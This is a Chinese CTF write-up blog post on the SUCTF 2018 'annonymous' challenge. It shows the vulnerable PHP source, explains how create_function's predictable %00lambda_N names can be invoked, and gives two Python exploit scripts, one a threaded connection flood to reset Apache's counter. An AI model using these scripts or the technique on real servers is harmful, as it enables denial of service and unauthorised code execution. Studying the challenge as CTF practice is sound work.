[SUCTF 2018]annonymous creat_function匿名函数~~

最新推荐文章于 2022-05-27 15:29:57 发布
最新推荐文章于 2022-05-27 15:29:57 发布
阅读量929 收藏 1
点赞数 1
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/104297107
版权

源码

<?php

$MY = create_function("","die(`cat flag.php`);");
$hash = bin2hex(openssl_random_pseudo_bytes(32));
eval("function SUCTF_$hash(){"
    ."global \$MY;"
    ."\$MY();"
    ."}");
if(isset($_GET['func_name'])){
    $_GET["func_name"]();
    die();
}
show_source(__FILE__);

其实我们只要执行$MY()就可以了~~,但是我们不知道这个函数的名名称,是一个匿名函数~~

create_function()这个函数的漏洞,他create之后会自动生成一个函数名为%00lambda_%d

%d这个值是一直递增的,这里的%d会一直递增到最大长度直到结束,这里我们可以通过大量的请求来迫使Pre-fork模式启动的Apache启动新的线程,这样这里的%d会刷新为1,就可以预测了。

简单粗暴的exp:

import requests
while True:
    r=requests.get('http://web.suctf.asuri.org:81/?func_name=%00lambda_1')
    print(r.text)

官方的exp

# coding: UTF-8
# Author: orange@chroot.org
# using python2

import requests
import socket
import time
from multiprocessing.dummy import Pool as ThreadPool
try:
    requests.packages.urllib3.disable_warnings()
except:
    pass

def run(i):
    while 1:
        HOST = '28ae7c60-92ae-447c-a9c9-b50024d45b25.node3.buuoj.cn'
        PORT = 80
        se = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        se.connect((HOST, PORT))
        se.send("GET / HTTP/1.1\r\n")
        se.send("Host: 28ae7c60-92ae-447c-a9c9-b50024d45b25.node3.buuoj.cn\r\n")
        se.send("Connection: keep-alive\r\n\r\n")
        # s.close()
        print 'ok'
        time.sleep(0.5)

i = 8
pool = ThreadPool( i )
result = pool.map_async( run, range(i) ).get(0xffff)
HyyMbb
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一道create_function代码执行
weixin_43999372的博客
04-08 919
create_function函数的实现代码执行的原理 一道ctf说明 <?php error_reporting(0); if(isset($_GET['action'])) { $action = $_GET['action']; } if(isset($_GET['action'])){ $arg = $_GET['arg']; } if(preg_match('/...
CTF题型 匿名函数考法&例题总结
最新发布
qq_39947980的博客
03-20 1352
二 .重点匿名函数利用 请熟记并理解为后面php代码审计打基础 匿名函数**特点:无函数名,使用一次就被丢弃,一般可以动态执行php代码**
[SUCTF 2018]annonymous 真的是匿名函数
qq_54929891的博客
05-27 428
<?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($_GET['func_name'])){ $_GET["func_name"](); die(); .
ctf+create_function()+scandir()学习
weixin_44255856的博客
04-10 1223
php官方手册中发现create_function函数,就等同于function函数的作用; create_function函数 <?php $newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);'); echo "New anonymous function: $newfunc\n";...
BUUCTF:[SUCTF 2018]annonymous
末初的CSDN博客
03-31 1254
[SUCTF 2018]annonymous <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();"...
BUUCTF--[SUCTF 2018]annonymous
qq_46263951的博客
07-28 259
进入页面后给出一段代码 <?php $MY = create_function("","die(`cat flag.php`);"); $hash = bin2hex(openssl_random_pseudo_bytes(32)); eval("function SUCTF_$hash(){" ."global \$MY;" ."\$MY();" ."}"); if(isset($_GET['func_name'])){ $_GET["func_name"](
AnonymousChat:匿名聊天
06-11
#AnonymousChat 基于网络的匿名聊天(HTML5 + Java) 由 ProjectM, HeXA (Yunjae Lee & Injoong Jeong) 开发##Dependent Java Websockets ##联系 mu29(InJung Chung) :
meanOs:平均值操作系统-第一个分散的,人工智能的MEAN.js堆栈操作系统。 Mean OS是唯一使用P2P网络和一组非标准浏览器内部传递机制匿名托管的操作系统。 Mean OS自豪地支持Brave和Tor,免费!
02-02
meanOs:平均值操作系统-第一个分散的,人工智能的MEAN.js堆栈操作系统。 Mean OS是唯一使用P2P网络和一组非标准浏览器内部传递机制匿名托管的操作系统。 Mean OS自豪地支持Brave和Tor,免费!
KH-map:王国大厅领土地图
05-23
KH图 王国大厅领土地图:) 帐号/用户 -> annonymous -> admin ->用例:->选择KH->负荷图->输入区域编号并向前移动区域->查看它属于哪个KH,并根据地点添加KH
[SUCTF 2018]annonymous
wuyaowangchuan的博客
01-26 698
<?php $MY = create_function("","die(`cat flag.php`);"); //创建一个$MY的匿名函数,函数的作用是输出flag //匿名函数其实是有真正的名字,为%00lambda_%d(%d格式化为当前进程的第n个匿名函数,n的范围0-999) $hash = (openssl_random_pseudo_bytes(32)); //生成一个随机数 eval("function SUCTF_$hash(){" ."global \$MY;"."\$MY();.
2018 SUCTF pass
ACdream
06-07 397
思路很棒的一个题,对AES-CBC模式的攻击也不是一次两次了,其实题目也给了思路,只是自己不清楚原理,导致看不懂提示做不出来题目代码:#coding: UTF-8 import socket import flag from Crypto.Cipher import AES def padding(message): toPadByte = 16 - len(message) % 16 ...
CGCTF平台web题writeup
test
10-25 1万+
前言 正文 签到题 10pt tips : 这一定是最简单的 连接 恩,key在源代码中 md5 collision 20pt 连接 直接贴出了代码 $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' &amp;amp;amp;&amp;amp;amp; $md51 == $md5...
2018SUCTF部分wp
Risker
05-28 2791
趁大佬都去打别的比赛,试了试SUCTF,依旧菜的一批,只做出来两道,GG。WEB:Anonymous:简单粗暴给源码,看着这源码好像在哪看过:没错,2017HITCON改的,只不过难度降低了一大截..把有难度的部分都去掉了。wp参考这里按照步骤操作,这道题只需要做最后的步骤,只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧,linu...
PHP命令执行
sca7tered的博客
10-02 877
PHP命令执行 主要函数 代码执行函数 ${} php复杂变量 <?php ${phpinfo()}; {KaTeX parse error: Expected 'EOF', got '}' at position 12: {getname()}}̲ => {s1ye} =>echo "s1ye";,可以发现先执行了getname函数并输出了“s1ye”,接着才执行了echo(优先级)。 $str = "{${phpinfo()}}",花括号定义了变量的边界,因此该条语句先执行括号中内容,
2018 SUCTF cycle
ACdream
06-08 491
比赛的时候看到这个题,通过率那么高,然后密钥长度给了提示是1-50,所以猜到了是暴力,太久没做Crypto了,已经忘记了还有维吉尼亚字频统计这一说了……找到了一个好的wp贴出来:https://findneo.tech/180527suctf/#Magic...
2018 SUCTF magic
ACdream
06-03 975
当时做题的时候得到的式子:(m[0] &amp; key) % 2 == ?(m[1] &amp; key) % 2 == *其中?和 * 很明显,不是0就是1啊!所以不妨换一种思路,如果我们把m和key都转化为二进制数,会发生什么!M表示m展开后的矩阵,K表示key展开之后的向量,C为cipher.txt转成的01向量,即有:MK = C矩阵乘法!二进制下的!也就是说,在有限域GF(2)中,有已...
[SUCTF 2019]CheckIn
沐目的博客
10-22 1万+
一、知识点 1.1exif_imagetype() 打开发现是上传,发现可以上传jpg等格式的文件。然后上传txt格式的文件,发现后台好像是通过exif_imagetype函数判断的— 判断一个图像的类型。 <?php if (exif_imagetype("image.gif") != IMAGETYPE_GIF) { echo "The picture is not a gif"...
百度杯CTF Write up集锦 WEB篇
热门推荐
4ct10n
09-21 4万+
九月场1.code一开始的URL为http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index.php?jpg=hei.jpg尝试着令jpg=index.php得出了base64编码的文本 丢到解码器里解出文本index.php<?php /** * Created by PhpStorm. *
Function create_function() is deprecated
梦里逆天的博客
08-31 5369
https://blog.csdn.net/weixin_34184561/article/details/92084636
ctf网站集合
yy2013
10-24 3322
本文是转载文章,看到作者写的这篇博文 总结的非常好,害怕以后丢失,所以转载备份。原文作者:4ido10n 原文请点击:原文正文如下:Author:4ido10nHome:http://www.secbox.cn/author/4ido10n学习的地方很多,不能一一列举,一些优秀的网址和博客可能也没有提到,大家补充吧:P就简单总结一些常用的吧,本人是十足的彩笔,还望大家多多指点,表哥们带我飞Orz

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值